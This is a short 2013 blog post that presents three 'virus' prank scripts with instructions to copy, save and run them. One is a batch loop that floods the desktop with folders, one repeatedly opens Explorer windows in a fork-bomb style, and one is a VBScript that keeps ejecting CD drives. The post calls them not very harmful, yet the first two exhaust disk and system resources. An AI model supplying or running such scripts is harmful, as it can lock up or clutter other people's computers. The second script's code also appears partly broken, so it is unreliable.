Dec 4, 2013

Virus Just for fun.

Here is a small code of virus created but it is not much harmful. It is created just for educational purpose. If you want to try out some of it then just copy the under given codes in notepad in the same format given and then save giving the filename "------.bat" and then save in desktop. Finally run the program you have just saved . Different colours means different codes for different viruses : )

First Virus:


@echo off
:loop
md %random%
goto loop


Second Virus: 


@echo off 
:loop 
explorer call fork.bat 
goto loop

 And Third Virus:


Set oWMP = CreateObject("WMPlayer.OCX.7") 
Set colCDROMs = oWMP.cdromCollection 
do 
if colCDROMs.Count >= 1 then 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
For i = 0 to colCDROMs.Count - 1 
colCDROMs.Item(i).Eject 
Next 
End If 
wscript.sleep 5000 
loop 


Note:
Font in Red creates lots and lots of folders in your desktop.
Font in Green causes a window to appear continuously.
Font in Blue causes ur CD drive to eject continuously. Text in blue must be saved with file name "------.vbs" thank you and sorry too : P

No comments:

Post a Comment

Don't be shy. Leave your comment here.